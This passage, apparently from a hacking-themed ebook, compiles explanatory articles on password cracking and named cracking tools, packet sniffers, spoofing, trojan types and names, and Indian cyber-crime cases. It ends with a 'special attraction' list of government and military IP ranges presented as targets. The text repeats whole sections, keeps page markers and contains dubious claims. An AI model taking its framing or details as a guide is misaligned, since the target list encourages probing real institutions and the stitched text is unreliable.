possibilities can be tried per second.
Guessing, combined with dictionary attacks, have been repeatedly and consistently
demonstrated for several decades to be sufficient to crack perhaps as many as 50% of all
account passwords on production systems.
37
Brute force attack
A last resort is to try every possible password, known as a brute force attack. In
theory, a brute force attack will always be successful since the rules for acceptable passwords
must be publicly known, but as the length of the password increases, so does the number of
possible passwords. This method is unlikely to be practical unless the password is relatively
small. But, how small is too small? A common current length recommendation is 8 or more
randomly chosen characters combining letters, numbers, and special (punctuation, etc)
characters. Systems which limit passwords to numeric characters only, or upper case only, or,
generally, which exclude possible password character choices make such attacks easier. Using
longer passwords in such cases (if possible on a particular system) can compensate for a
limited allowable character set. And, of course, even with an adequate range of character
choice, users who ignore that range (using only upper case alphabetic characters, or digits
alone, for instance) make brute force attacks much easier against those password choices.
Generic brute-force search techniques can be used to speed up the computation. But the real
threat may be likely to be from smart brute-force techniques that exploit knowledge about
how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of
password quality, and suggests, for example, that an 8 character user-chosen password may
provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. Note:
This number is very far less than what is generally considered to be safe for an encryption
key.
How small is too small thus depends partly on an attacker's ingenuity and resources
(e.g., available time, computing power, etc.), the latter of which will increase as computers
get faster. Most commonly used hashes can be implemented using specialized hardware,
allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying
a separate portion of the search space. Unused overnight and weekend time on office
computers can also be used for this purpose.
The distinction between guessing, dictionary and brute force attacks is not strict. They are
similar in that an attacker goes through a list of candidate passwords one by one; the list may
be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about
the victim, and may or may not be linguistically derived. Each of the three approaches,
particularly 'dictionary attack', is frequently used as an umbrella term to denote all the three
attacks and the spectrum of attacks encompassed by them.
38
Precomputation
In its most basic form, precomputation involves hashing each word in the dictionary
(or any search space of candidate passwords) and storing the <plaintext, ciphertext> pairs in a
way that enables lookup on the ciphertext field. This way, when a new encrypted password is
obtained, password recovery is instantaneous. Precomputation can be very useful for a
dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost
of mass storage has made it practical for fairly large dictionaries.
Advanced precomputation methods exist that are even more effective. By applying a time-
memory tradeoff, a middle ground can be reached - a search space of size N can be turned
into an encrypted database of size O(N2/3) in which searching for an encrypted password
takes time O(N2/3). The theory has recently been refined into a practical technique, and the
online implementation at http://passcracking.com/ achieves impressive results on 8 character
alphanumeric MD5 hashes. Another example [1] cracks alphanumeric Windows LAN
Manager passwords in a few seconds. This is much faster than brute force attacks on the
obsolete LAN Manager, which uses a particularly weak method of hashing the password.
Current Windows systems still compute and store a LAN Manager hash by default for
backwards compatibility. [2])
A technique similar to precomputation, known generically as memoization, can be
used to crack multiple passwords at the cost of cracking just one. Since encrypting a word
takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting
each word only once and comparing it with each of the encrypted passwords using an
efficient list search algorithm. The two approaches may of course be combined: the time-
space tradeoff attack can be modified to crack multiple passwords simultaneously in a shorter
time than cracking them one after the other.
Salting
The benefits of precomputation and memoization can be nullified by randomizing the
hashing process. This is known as salting. When the user sets a password, a short, random
string called the salt is suffixed to the password before encrypting it; the salt is stored along
with the encrypted password so that it can be used during verification. Since the salt is usually
different for each user, the attacker can no longer construct tables with a single encrypted
version of each candidate password. Early Unix systems used a 12-bit salt. Attackers could
still build tables with common passwords encrypted with all 4096 possible 12-bit salts.
39
However, if the salt is long enough (e.g. 32 bits), there are too many possibilities and the
attacker must repeat the encryption of every guess for each user.
Early Unix password vulnerability
Early Unix implementations used a 12-bit salt, which allowed for 4096 possibilities,
and limited passwords to 8 characters. While 12 bits was good enough for most purposes in
the 1970s (although some expressed doubts even then), by 2005 disk storage has become
cheap enough that an attacker can precompute encryptions of millions of common passwords,
including all 4096 possible salt variations for each password, and store the precomputed
values on a single portable hard drive. An attacker with a larger budget can build a disk farm
with all 6 character passwords and the most common 7 and 8 character passwords stored in
encrypted form, for all 4096 possible salts. And when several thousand passwords are being
cracked at once, memoization still offers some benefit. Since there is little downside to using
a longer (say 32-, 64- or 128-bit) salt, and they render any precomputation or memoization
hopeless, modern implementations choose to do so.
Prevention
The best method of preventing password cracking is to ensure that attackers cannot
get access even to the encrypted password. For example, on the Unix operating system,
encrypted passwords were originally stored in a publicly accessible file "/etc/passwd". On
modern Unix (and similar) systems, on the other hand, they are stored in the file
"/etc/shadow", which is accessible only to programs running with enhanced privileges (ie,
'system' privileges). This makes it harder for a malicious user to obtain the encrypted
passwords in the first instance. Unfortunately, many common network protocols transmit the
hashed passwords to allow remote authentication.
Even if the attacker has no access to the password database itself, every attacker
should also be prevented from being able to use the system itself to check a large number of
passwords in a relatively small amount of time. For this reason, many systems include a
significant forced delay (a few seconds is generally sufficient) between the entry of the
password and returning a result. Also, it is a good policy to (temporarily) lock out an account
that has been subjected to 'too many' incorrect password guesses, although this could be
exploited to launch a denial of service attack. Too many in this context is frequently taken to
be something like more than 3 failed attempts in 90 seconds, or more than a dozen failed
attempts in an hour.
40
It is also imperative to choose good passwords (see password for more information)
and a good encryption or hash algorithm that has stood the test of time. AES, SHA-1, and
MD5 are common choices. Good implementations, including adequate salt, are also required.
Key derivation functions, such as PBKDF2, are hashes that consume relatively large amounts
of computer time so as to slow down the rate at which an attacker can test guesses, even if the
hashed password is available. This process is known as key strengthening.
However, no amount of effort put into preventing password cracking can be sufficient
without a well-designed and well-implemented security policy. The canonical and all too
common example of this is the user who leaves their password on a Post-It note stuck to their
monitor or under their keyboard. Even sophisticated users who have been warned repeatedly
are known to have such lapses.
Password cracking programs
• Ophcrack - Open source
Ophcrack is an Open Source (GPL License) program that cracks Windows LM hashes using
rainbow tables. It can crack 99.9% of alphanumeric passwords of up to 14 characters in
usually a few seconds, and at most a few minutes. There is also a LiveCD version which
automates the retrieval, decryption, and cracking of passwords from a Windows
system.Starting with version 2.3, Ophcrack also cracks NT hashes.
• Crack
Crack is a Unix password cracking program designed to allow system administrators to locate
users who may have weak passwords vulnerable to a dictionary attack.
Crack began in 1990 when Alec Muffett, a Unix system administrator at the University of
Wales Aberystwyth was trying to improve Dan Farmer's 'pwc' cracker in COPS and found
that by re-engineering its memory management he got a noticeable performance increase.
This led to a total rewrite which became "Crack v2.0" and further development to improve
usability.
• Cain
Cain and Abel is a Windows password recovery tool. It can recover many kinds of passwords
using methods such as network packet sniffing, cracking various password hashes by using
methods such as dictionary attacks, brute force and cryptanalysis attacks. Cryptanalysis
attacks are done via rainbow tables which can be generated with the winrtgen.exe program
provided with Cain. Cain and Abel is maintained by Massimiliano Montoro.
• John the Ripper
41
John the Ripper is a free password cracking software tool. Initially developed for the UNIX
operating system, it currently runs on fifteen different platforms (11 flavors of Unix -
counting each flavor only once for all the architectures it supports -, DOS, Win32, BeOS, and
OpenVMS). It is one of the most popular password testing/breaking programs as it combines
a number of password crackers into one package, autodetects, and includes a customisable
cracker. It can be run against various encrypted password formats including several crypt
password hash types most commonly found on various Unix flavors (based on DES, MD5, or
Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules
have extended its ability to include MD4-based password hashes and passwords stored in
LDAP, MySQL and others.
John the Ripper is a perfectly safe program to install and run on your computer. If you are
running a multi-user system, you should make sure you are shadowing your password file
such that the hashes are not visible; however even if you are not, not installing John will not
prevent a malicious user from running John on their own computer with your hashes[citation
needed].
• LC5 (formerly L0phtCrack)
L0phtCrack is a password auditing and recovery application (now called LC5), originally
produced by Mudge from L0pht Heavy Industries. It is used to test password strength and
sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force,
and hybrid attacks. It was one of the crackers' tools of choice, although most use old versions
because of its price and low availability.
The application was produced by @stake after the L0pht merged with @stake in 2000.
@stake was acquired by Symantec in 2004. Symantec has since stopped selling this tool to
new customers citing US Government export regulations, and has announced that they will
discontinue support by the end of 2006. LC5 can still be found at SecTools.Org and other
unofficial mirrors.
• RainbowCrack
RainbowCrack is the name of a computer program which performs password cracking.
RainbowCrack differs from "conventional" brute force crackers in that it uses large pre-
computed files called rainbow tables to reduce the length of time needed to crack a password
drastically.
RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory
trade-off cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.
Back42
43
44
Sniffers: Basics and Detection
“If you know the enemy and know yourself, you need not fear the result of a hundred
battles. If you know yourself but not the enemy, for every victory gained you will also
suffer a defeat. If you know neither the enemy nor yourself, you will succumb in
every battle.”
Introduction
A sniffer is a program or a device that eavesdrops on the network traffic by grabbing
information traveling over a network. Sniffers basically are "Data Interception" technology.
They work because the Ethernet was built around a principle of sharing. Most networks use
broadcast technology wherein messages for one computer can be read by another computer
on that network. In practice, all the other computers except the one for which the message is
meant, will ignore that message. However, computers can be made to accept messages even if
they are not meant for them. This is done by means of a Sniffer! Many people assume
computers connected to a switch are safe from sniffing. Nothing could be further from the
truth. Computers connected to switches are just as vulnerable to sniffing as those connected to
a hub. This article seeks to explore the topic of sniffers, how they work, detecting and
protecting your assets against the malicious use of these programs. Finally, towards the end
we will talk about some commonly available sniffers.
How A Sniffer Works
A computer connected to the LAN has two addresses. One is the MAC (Media Access
Control) address that uniquely identifies each node in a network and is stored on the network
card itself. It is the MAC address that gets used by the Ethernet protocol while building
“frames” to transfer data to and from a machine. The other is the IP address, which is used by
applications. The Data Link Layer uses an Ethernet header with the MAC address of the
destination machine rather than the IP Address. The Network Layer is responsible for
mapping IP network addresses to the MAC address as required by the Data Link Protocol. It
initially looks up the MAC address of the destination machine in a table, usually called the
ARP (Address Resolution Protocol) cache. If no entry is found for the IP address, the Address
Resolution Protocol broadcasts a request packet (ARP request) to all machines on the
network. The machine with that address responds to the source machine with its MAC
45
address. This MAC address then gets added to the source machine’s ARP Cache. The source
machine in all its communications with the destination machine then uses this MAC address.
There are two basic types of Ethernet environments and how sniffers work in both these cases
is slightly different.Shared Ethernet: In a shared Ethernet environment, all hosts are connected
to the same bus and compete with one another for bandwidth. In such an environment packets
meant for one machine are received by all the other machines. Thus when a machine Venus
46
Well-known packet sniffers
• AiroPeek
• dSniff
• Ethereal
• EtherPeek
• Ettercap
• Kismet
• Javvin Packet Aalyzer
• NetStumbler
• Network General Sniffer
• Network Instruments Observer
• OmniPeek
• PRTG
• snoop (Solaris)
• tcpdump
• Wireshark (formerly known as Ethereal[1])
• WPE (Winsock packet editor)
Spoofing attackSpoofing attack
In the context of network security, a spoofing attack is a situation in which one person
or program successfully masquerades as another by falsifying data and thereby gains an
illegitimate advantage.
Man-in-the-middle attack and internet protocol spoofingMan-in-the-middle attack and internet protocol spoofing
An example from cryptography is the man-in-the-middle attack, in which an attacker
spoofs Alice into believing he's Bob, and spoofs Bob into believing he's Alice, thus gaining
access to all messages in both directions without the trouble of any cryptanalytic effort.
47
The attacker must monitor the packets sent from Alice to Bob and then guess the sequence
number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his
own packets, claiming to have the address of Alice. Alice's firewall can defend against some
spoof attacks when it has been configured with knowledge of all the IP addresses connected
to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is
not known to be connected to the IP address.
Many carelessly designed protocols are subject to spoof attacks, including many of those used
on the Internet. See Internet protocol spoofing.
URL spoofing and phishing URL spoofing and phishing
Another kind of spoofing is "webpage spoofing," also known as phishing. In this
attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another
server under control of the attacker. The intent is to fool the users into thinking that they are
connected to a trusted site, for instance to harvest user names and passwords.This attack is
often performed with the aid of URL spoofing, which exploits web browser bugs in order to
display incorrect URLs in the browsers location bar; or with DNS cache poisoning in order to
direct the user away from the legitimate site and to the fake one. Once the user puts in their
password, the attack-code reports a password error, then redirects the user back to the
legitimate site.
Referer spoofingReferer spoofing
Some websites, especially pornographic paysites, allow access to their materials only
from certain approved (login-) pages. This is enforced by checking the Referer header of the
HTTP request. This referer header however can be changed (known as "Referer spoofing" or
"Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.
Poisoning of file-sharing networks
"Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of
works on file-sharing networks, to discourage downloading from these sources.
Caller ID spoofing Caller ID spoofing
In public telephone networks, it has for a long while been possible to find out who is
calling you by looking at the Caller ID information that is transmitted with the call. There are
technologies that transmit this information on landlines, on cellphones and also with VoIP.
48
Unfortunately, there are now technologies (especially associated with VoIP) that allow callers
to lie about their identity, and present false names and numbers, which could of course be
used as a tool to defraud or harass. Because there are services and gateways that interconnect
VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone
on the planet, which makes the whole Caller ID information now next to useless. Due to the
distributed geographic nature of the Internet, VoIP calls can be generated in a different
country to the receiver, which means that it is very difficult to have a legal framework to
control those who would use fake Caller IDs as part of a scam.
Man-in-the-middle attack and internet protocol spoofingMan-in-the-middle attack and internet protocol spoofing
An example from cryptography is the man-in-the-middle attack, in which an attacker
spoofs Alice into believing he's Bob, and spoofs Bob into believing he's Alice, thus gaining
access to all messages in both directions without the trouble of any cryptanalytic effort.
The attacker must monitor the packets sent from Alice to Bob and then guess the sequence
number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his
own packets, claiming to have the address of Alice. Alice's firewall can defend against some
spoof attacks when it has been configured with knowledge of all the IP addresses connected
to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is
not known to be connected to the IP address.
Many carelessly designed protocols are subject to spoof attacks, including many of those used
on the Internet. See Internet protocol spoofing.
URL spoofing and phishing URL spoofing and phishing
Another kind of spoofing is "webpage spoofing," also known as phishing. In this
attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another
server under control of the attacker. The intent is to fool the users into thinking that they are
connected to a trusted site, for instance to harvest user names and passwords.
This attack is often performed with the aid of URL spoofing, which exploits web browser
bugs in order to display incorrect URLs in the browsers location bar; or with DNS cache
poisoning in order to direct the user away from the legitimate site and to the fake one. Once
the user puts in their password, the attack-code reports a password error, then redirects the
user back to the legitimate site.
49
Referer spoofing Referer spoofing
Some websites, especially pornographic paysites, allow access to their materials only
from certain approved (login-) pages. This is enforced by checking the Referer header of the
HTTP request. This referer header however can be changed (known as "Referer spoofing" or
"Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.
Poisoning of file-sharing networksPoisoning of file-sharing networks
"Spoofing" can also refer to copyright holders placing distorted or unlistenable
versions of works on file-sharing networks, to discourage downloading from these sources.
Caller ID spoofing Caller ID spoofing
In public telephone networks, it has for a long while been possible to find out who is
calling you by looking at the Caller ID information that is transmitted with the call. There are
technologies that transmit this information on landlines, on cellphones and also with VoIP.
Unfortunately, there are now technologies (especially associated with VoIP) that allow callers
to lie about their identity, and present false names and numbers, which could of course be
used as a tool to defraud or harass. Because there are services and gateways that interconnect
VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone
on the planet, which makes the whole Caller ID information now next to useless. Due to the
distributed geographic nature of the Internet, VoIP calls can be generated in a different
country to the receiver, which means that it is very difficult to have a legal framework to
control those who would use fake Caller IDs as part of a scam.
Trojan horse
Example of a simple Trojan horse
A simple example of a trojan horse would be a program named "waterfalls.scr" claiming to be
a free waterfall screensaver which, when run, instead begins erasing all the files on the
victim’s computer.
Types of Trojan horses
Trojan horses are almost always designed to do various harmful things, but could be
harmless. They are broken down in classification based on how they breach systems and the
damage they cause. The seven main types of Trojan horses are:
• Remote Access Trojans
• Data Sending Trojans
50
• Destructive Trojans
• Proxy Trojans
• FTP Trojans
• security software disabler Trojans
• denial-of-service attack (DoS) Trojans
• URL Trojans
Some examples are:
• erasing or overwriting data on a computer.
• encrypting files in a cryptoviral extortion attack.
• corrupting files in a subtle way.
• upload and download files.
• allowing remote access to the victim's computer. This is called a RAT. (remote
administration tool)
• spreading other malware, such as viruses. In this case the Trojan horse is called
a 'dropper' or 'vector'.
• setting up networks of zombie computers in order to launch DDoS attacks or
send spam.
• spying on the user of a computer and covertly reporting data like browsing
habits to other people (see the article on spyware).
• make screenshots.
• logging keystrokes to steal information such as passwords and credit card
numbers (also known as a keylogger).
• phish for bank or other account details, which can be used for criminal
activities.
• installing a backdoor on a computer system.
• opening and closing CD-ROM tray.
• harvest e-mail addresses and use them for spam.
• Restarts the computer whenever the infected program is started.
Time bombs and logic bombs
"Time bombs" and "logic bombs" are types of trojan horses.
"Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain
conditions met by the computer.
51
Droppers
Droppers perform two tasks at once. A dropper performs a legitimate task but also
installs a computer virus or a computer worm on a system or disk at the same time.
Precautions against Trojan horses
Trojan horses can be protected against through end-user awareness. Trojan Horse
viruses can cause a great deal of damage to a personal computer but even more damage to a
business, particularly a small business that usually does not have the same virus protection
capabilities as a large business. Since a Trojan Horse virus is hidden, it is harder to protect
yourself or your company from it, but there are things that you can do.
Trojan Horses are most commonly spread through an e-mail, much like other types of
common viruses. The only difference being of course is that a Trojan Horse is hidden. The
best ways to protect yourself and your company from Trojan Horses are as follows:
1. If you receive e-mail from someone that you do not know or you receive an unknown
attachment, never open it right away. As an e-mail user you should confirm the source. Some
hackers have the ability to steal address books, so if you see e-mail from someone you know,
it is not necessarily safe.
2. When setting up your e-mail client, make sure that you have the settings so that
attachments do not open automatically. Some e-mail clients come ready with an anti-virus
program that scans any attachments before they are opened. If your client does not come with
this, it would be best to purchase one or download one for free.
3. Make sure your computer has an anti-virus program on it and update it regularly. If you
have an auto-update option included in your anti-virus program you should turn it on; that
way if you forget to update your software you can still be protected from threats
4. Operating systems offer patches to protect their users from certain threats and viruses,
including Trojan Horses. Software developers like Microsoft offer patches that in a sense
"close the hole" that the Trojan horse or other virus would use to get through to your system.
If you keep your system updated with these patches, your computer is kept much safer.
5. Avoid using peer-to-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella
because they are generally unprotected from viruses and Trojan Horse viruses spread through
them especially easily. Some of these programs do offer some virus protection, but this is
52
often not strong enough. If you insist on using P2P, it would be safe to not download files that
claim to be "rare" songs, books, movies, pictures, etc.
Besides these sensible precautions, one can also install anti-trojan software, some of
which is offered free.
Methods of Infection
The majority of trojan horse infections occur because the user was tricked into
running an infected program. This is why it is advised to not open unexpected attachments on
emails -- the program is often a cute animation or a sexy picture, but behind the scenes it
infects the computer with a trojan or worm. The infected program doesn't have to arrive via
email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by
FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you
were the specific target of an attack, it would be a fairly reliable way to infect your computer.)
Furthermore, an infected program could come from someone who sits down at your computer
and loads it manually.
Websites: You can be infected by visiting a rogue website.
Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that
Internet Explorer has, even if you don't use IE directly.
Open ports: Computers running their own servers (HTTP, FTP, or SMTP, for
example), allowing Windows file sharing, or running programs that provide filesharing
capabilities such as Instant Messengers (AOL's AIM, MSN Messenger, etc.) may have
vulnerabilities similar to those described above. These programs and services may open a
network port giving attackers a means for interacting with these programs from anywhere on
the Internet. Vulnerabilities allowing unauthorized remote entry are regularly found in such
programs, so they should be avoided or properly secured.
A firewall may be used to limit access to open ports. Firewalls are widely used in
practice, and they help to mitigate the problem of remote trojan insertion via open ports, but
they are not a totally impenetrable solution, either.
Some of the modern trojans that come through the messengers,they come in as a very
important looking message, but contain trojans, the exe files are same or look same as that of
windows system proccesses like 'Svchost.exe', some of the look alike trojans are:
• Svchost32.exe
• Svhost.exe
• back.exe
53
Well-known trojan horses
• Back Orifice
• Back Orifice 2000
• NetBus
• SubSeven
• Downloader-EV
• Pest Trap
• AIDS
• Back Orifice
• Back Orifice 2000
• Beast Trojan
• Bifrose ksv
• Insurrection
• NetBus Carl-Fredrik Neikter
• Optix Pro
• Posion Ivy
• ProRat
• Sub7
• EGABTR
• RemoteHAK
• A-311 Death
• A4zeta
• Abacab
• Acessor
• AcidBattery
• Acid Drop
• AcidHead
• Acid Kor
• Acidsena
• AcidShivers
• Acid Trojan Horse
• AckCmd
• Acojonaor
54
• Acropolis
• Admin.Troj.Kikzyurarse
• Advertiser Bot
• AeonwindDoll
• Afcore
• A-FTP
• AF
• Agent 40421
• AH
• Aibolit
• AIMaster
• AIM Filter
• AimFrame
• aim P
• Aim Password Stealer
• AIM Pws
• AimRat
• AIM Robber
• AIM Spy
• AIMVision
• AIR
• AirBot
• Akosch
• Aladino
• Al-Bareki
• Alcatraz
• Alerter
• AlexMessoMalex
• Alicia
• Alien Hacker
• Alien Spy
• Almaster
• Almetyevsk
• Almq
55
• Alex
• Alofin
• Alop
• Alph
• AlphaDog
• Alvgus
• Amanda
• Amiboide Uploader
• Ambush
• AmigaAnywhere
• Amitis
• Amoeba
• AMRC
• AMS
• Anal FTP
• Anal Ra
• AnarchoIntruder
• Andromeda
• A New Trojan
• Angelfire
• AngelShell
• Annoy Toys
• Anthena
• Anti Danger
• Anti-Denial
• AntiMks
• AntiPC
• AntiLamer Backdoor
• Anti MSN
• Antylamus
• AolAdmin
• Apdoor
• Aphex's FTP
• Aphex's Remote Packet Sniffer
56
• Aphex tunneld 2.0
• AppServ
• APRE
• Aqua
• Arcanum
• Area Control
• Ares Invader
• Armageddon
• arplhmd
• Arranca
• Arsd
• Artic
• Arturik
• AsbMay
• A.S.H.
• Ashley
• Ass4ss1n
• Assasin
• Asylum
• Admin.Troj.Kikzyurarse
• Atentator
• A-Trojan
• Attack FTP
• Atwinda
• AudioDoor
• Autocrat
• AutoPWN
• Autograph
• AutoSpY
• Avanzado
• Avone
• Ayan Bilisim
• Azrael
• BD Blade runner 0.80a
57
• Crazy Daisy
• Connect4 Rituall33
• Donald Dick
• Flatley Trojan
• Theef
• Twelve Tricks
Back
58
59
Introduction to Cyber CrimeIntroduction to Cyber Crime
The first recorded cyber crime took place in the year
1820! That is not surprising considering the fact that the
abacus, which is thought to be the earliest form of a computer,
has been around since 3500 B.C. in India, Japan and China.
The era of modern computers, however, began with the
analytical engine of Charles Babbage.
In 1820, Joseph-Marie Jacquard, a textile manufacturer
in France, produced the loom. This device allowed the
repetition of a series of steps in the weaving of special fabrics.
This resulted in a fear amongst Jacquard's employees that their traditional employment and
livelihood were being threatened. They committed acts of sabotage to discourage Jacquard
from further use of the new technology. This is the first recorded cyber crime!
Today computers have come a long way, with neural networks and nano-computing
promising to turn every atom in a glass of water into a computer capable of performing a
Billion operations per second.
Cyber crime is an evil having its origin in the growing dependence on computers in
modern life. In a day and age when everything from microwave ovens and refrigerators to
nuclear power plants is being run on computers, cyber crime has assumed rather sinister
implications. Major cyber crimes in the recent past include the Citibank rip off. US $ 10
million were fraudulently transferred out of the bank and into a bank account in Switzerland.
A Russian hacker group led by Vladimir Kevin, a renowned hacker, perpetrated the attack.
The group compromised the bank's security systems. Vladimir was allegedly using his office
computer at AO Saturn, a computer firm in St. Petersburg, Russia, to break into Citibank
computers. He was finally arrested on Heathrow airport on his way to Switzerland
60
Defining Cyber CrimeDefining Cyber Crime
At the onset, let us satisfactorily define "cyber crime" and differentiate it from
"conventional Crime". 166 Computer crime can involve criminal activities that are traditional
in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the
Indian Penal Code. The abuse of computers has also given birth to a gamut of new age crimes
that are addressed by the Information Technology Act, 2000. Defining cyber crimes, as "acts
that are punishable by the Information Technology Act" would be unsuitable as the Indian
Penal Code also covers many cyber crimes, such as email spoofing and cyber defamation,
sending threatening emails etc. A simple yet sturdy definition of cyber crime would be
"unlawful acts wherein the computer is either a tool or a target or both". Let us examine the
acts wherein the computer is a tool for an unlawful act. This kind of activity usually involves
a modification of a conventional crime by using computers. Some examples are:
Financial crimesFinancial crimes
This would include cheating, credit card frauds, money laundering etc. To cite a recent
case, a website offered to sell Alphonso mangoes at a throwaway price. Distrusting such a
transaction, very few people responded to or supplied the website with their credit card
numbers. These people were actually sent the Alphonso mangoes. The word about this
website now spread like wildfire. Thousands of people from all over the country responded
and ordered mangoes by providing their credit card numbers. The owners of what was later
proven to be a bogus website then fled taking the numerous credit card numbers and
proceeded to spend huge amounts of money much to the chagrin of the card owners.
Cyber pornographyCyber pornography
61
This would include pornographic websites; pornographic magazines produced using
computers (to publish and print the material) and the Internet (to download and transmit
pornographic pictures, photos, writings etc). Recent Indian incidents revolving around cyber
pornography include the Air Force Balbharati School case. A student of the Air Force
Balbharati School, Delhi, was teased by all his classmates for having a pockmarked face.
Tired of the cruel jokes, he decided to get back at his tormentors. He scanned photographs of
his classmates and teachers, morphed them with nude photographs and put them up on a
website that he uploaded on to a free web hosting service. It was only after the father of one
of the class girls featured on the website objected and lodged a complaint with the police that
any action was taken.
In another incident, in Mumbai a Swiss couple would gather slum children and then would
force them to appear for obscene photographs. They would then upload these photographs to
websites specially designed for paedophiles. The Mumbai police arrested the couple for
pornography.
Sale of illegal articlesSale of illegal articles
This would include sale of narcotics, weapons and wildlife etc., by posting
information on websites, auction websites, and bulletin boards or 167 simply by using
email communication. E.g. many of the auction sites even in India are believed to be
selling cocaine in the name of 'honey'.
Online gamblingOnline gambling
There are millions of websites; all hosted on servers
abroad, that offer online gambling. In fact, it is believed that
many of these websites are actually fronts for money laundering.
62
63
Intellectual Property crimesIntellectual Property crimes
These include software piracy, copyright infringement, trademarks violations, theft of
computer source code etc.
Email spoofingEmail spoofing
A spoofed email is one that appears to originate from one source but actually has been
sent from another source. E.g. Pooja has an e-mail address [email protected]. Her enemy,
Sameer spoofs her e-mail and sends obscene messages to all her acquaintances. Since the e-
mails appear to have originated from Pooja, her friends could take offence and relationships
could be spoiled for life. Email spoofing can also cause monetary damage. In an American
case, a teenager made millions of dollars by spreading false information about certain
companies whose shares he had short sold. This misinformation was spread by sending
spoofed emails, purportedly from news agencies like Reuters, to share brokers and investors
who were informed that the companies were doing very badly. Even after the truth came out
the values of the shares did not go back to the earlier levels and thousands of investors lost a
lot of money.
ForgeryForgery
Counterfeit currency notes, postage and revenue stamps, mark sheets etc can be forged
using sophisticated computers, printers and scanners. Outside many colleges across India, one
finds touts soliciting the sale of fake mark sheets or even certificates. These are made using
computers, and high quality scanners and printers. In fact, this has becoming a booming
business involving thousands of Rupees being given to student gangs in exchange for these
bogus but authentic looking certificates.
Cyber Defamation Cyber Defamation
64
This occurs when defamation takes place with the help of computers and / or the
Internet. E.g. someone publishes defamatory matter about someone on a website or sends e-
mails containing defamatory information to all of that person's friends.
In a recent occurrence, Surekha (names of people have been changed), a young girl was about
to be married to Suraj. She was really pleased because despite it being an arranged marriage,
she had liked the boy. He had seemed to be open-minded and pleasant. Then, one day when
she met Suraj, he looked worried and even a little upset. He was not really interested in
talking to her. When asked he told her that, members of his family had been receiving e-mails
that contained malicious things about Surekha's character. Some of them spoke of affairs,
which she had had in the past. He told her 168 that, his parents were justifiably very upset and
were also considering breaking off the engagement. Fortunately, Suraj was able to prevail
upon his parents and the other elders of his house to approach the police instead of blindly
believing what was contained in the mails.During investigation, it was revealed that the
person sending those e-mails was none other than Surekha's stepfather. He had sent these e-
mails so as to break up the marriage. The girl's marriage would have caused him to lose
control of her property of which he was the guardian till she got married. Another famous
case of cyber defamation occurred in America. All friends and relatives of a lady were beset
with obscene e-mail messages appearing to originate from her account. These mails were
giving the lady in question a bad name among her friends. The lady was an activist against
pornography. In reality, a group of people displeased with her views and angry with her for
opposing them had decided to get back at her by using such underhanded methods. In
addition to sending spoofed obscene e-mails they also put up websites about her, that
basically maligned her character and sent e-mails to her family and friends containing matter
defaming her.
Cyber stalkingCyber stalking
The Oxford dictionary defines stalking as "pursuing stealthily". Cyber stalking
nvolves following a person's movements across the Internet by posting messages (sometimes
threatening) on the bulletin boards frequented by the victim, entering the chat-rooms
frequented by the victim, constantly bombarding the victim with emails etc.
65
Back
66
67
Index
• IP Address
• Default Router Password
• Net BIOS
• Mobile Hacking
Back
68
Special attraction
Government, military and intelligence IP range.
RANGE 6
6.* - Army Information Systems Center
RANGE 7
7.*.*.* Defense Information Systems Agency, VA
RANGE 11
11.*.*.* DoD Intel Information Systems, Defense Intelligence Agency, Washington DC
RANGE 21
21. - US Defense Information Systems Agency
RANGE 22
22.* - Defense Information Systems Agency
RANGE 24
24.198.*.*
RANGE 25
25.*.*.* Royal Signals and Radar Establishment, UK
RANGE 26
26.* - Defense Information Systems Agency
RANGE 29
29.* - Defense Information Systems Agency
RANGE 30
30.* - Defense Information Systems Agency
69
RANGE 49
49.* - Joint Tactical Command
RANGE 50
50.* - Joint Tactical Command
RANGE 55
55.* - Army National Guard Bureau
RANGE 128
128.51.0.0 Department of Defense
128.56.0.0 U.S. Naval Academy
128.60.0.0 Naval Research Laboratory
128.63.0.0 Army Ballistics Research Laboratory
128.80.0.0 Army Communications Electronics Command
128.98.0.0 - 128.98.255.255 Defence Evaluation and Research Agency
128.102.0.0 NASA Ames Research Center
128.149.0.0 NASA Headquarters
128.154.0.0 NASA Wallops Flight Facility
128.155.0.0 NASA Langley Research Center
128.156.0.0 NASA Lewis Network Control Center
128.157.0.0 NASA Johnson Space Center
128.158.0.0 NASA Ames Research Center
128.159.0.0 NASA Ames Research Center
128.160.0.0 Naval Research Laboratory
128.161.0.0 NASA Ames Research Center
128.183.0.0 NASA Goddard Space Flight Center
128.190.0.0 Army Belvoir Reasearch and Development Center
128.202.0.0 50th Space Wing
128.216.0.0 MacDill Air Force Base
128.236.0.0 U.S. Air Force Academy
RANGE 129
129.23.0.0 Strategic Defense Initiative Organization 70
129.29.0.0 United States Military Academy
129.50.0.0 NASA Marshall Space Flight Center
129.51.0.0 Patrick Air Force Base
129.52.0.0 Wright-Patterson Air Force Base
129.165.0.0 NASA Goddard Space Flight Center
129.166.0.0 NASA - John F. Kennedy Space Center
129.167.0.0 NASA Marshall Space Flight Center
129.168.0.0 NASA Lewis Research Center
129.190.0.0 Naval Underwater Systems Center
129.198.0.0 Air Force Flight Test Center
129.209.0.0 Army Ballistics Research Laboratory
129.229.0.0 U.S. Army Corps of Engineers
